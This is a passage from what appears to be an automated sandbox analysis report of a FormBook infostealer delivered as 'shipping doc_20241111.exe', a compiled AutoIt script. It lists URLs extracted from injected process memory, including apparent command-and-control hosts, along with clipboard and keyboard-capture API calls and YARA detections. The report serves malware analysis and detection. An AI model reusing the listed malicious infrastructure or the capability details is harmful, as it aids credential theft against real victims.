Source: AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4110035048.00000000067C2000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000004FE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.hasthosting.xyz/04fb/?Ir8HUj=EDSq5eKeQ/yn
Source: AtBroker.exe, 00000003.00000002.4110035048.0000000005034000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003854000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2067710841.0000000019264000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://00808.vip/
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AtBroker.exe, 00000003.00000002.4110035048.0000000005FE8000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000004808000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://getbootstrap.com/)
Source: AtBroker.exe, 00000003.00000002.4110035048.0000000005FE8000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000004808000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: AtBroker.exe, 00000003.00000002.4108398193.0000000002A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: AtBroker.exe, 00000003.00000002.4108398193.0000000002A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: AtBroker.exe, 00000003.00000002.4108398193.0000000002A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: AtBroker.exe, 00000003.00000002.4108398193.0000000002A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2h
Source: AtBroker.exe, 00000003.00000002.4108398193.0000000002A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: AtBroker.exe, 00000003.00000002.4108398193.0000000002A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: AtBroker.exe, 00000003.00000002.4108398193.0000000002A34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: AtBroker.exe, 00000003.00000003.1952114492.00000000076EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281533072611.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281551058064.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281739019902.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281742124338.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202309/19/202309191047059862.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/02/202310021539053089.jpg
Source: DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111308331250.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111316162395.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111336168422.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111352290269.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111414394270.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111418363409.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111441491430.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111457131826.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111650528174.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111730363919.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121012371226.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121017068870.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121040515603.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121107457674.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg
Source: AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/15/202310151543577674.gif
Source: AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=
Source: AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AtBroker.exe, 00000003.00000002.4110035048.0000000005E56000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000004676000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.kghjkx.xyz/usop/?Ir8HUj=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJ
Source: AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land
Source: AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lan
Source: AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_h
Source: AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/sozdanie-saita/
Source: AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&reg_source=parking_auto

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FBEA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00FBEA26

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FBEC91 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00FBEC91

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

0_2_00FBEA26

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FAA975 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_00FAA975

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FD9468 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00FD9468

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.2540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.2540000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4109217815.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4108005033.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4109259542.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765791231.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765495774.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4109168636.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765284786.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4110795984.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00F4445D
Source: shipping doc_20241111.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: shipping doc_20241111.exe, 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2d14e45d-c
Source: shipping doc_20241111.exe, 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_091e3633-2
Source: shipping doc_20241111.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3d15fcc7-e
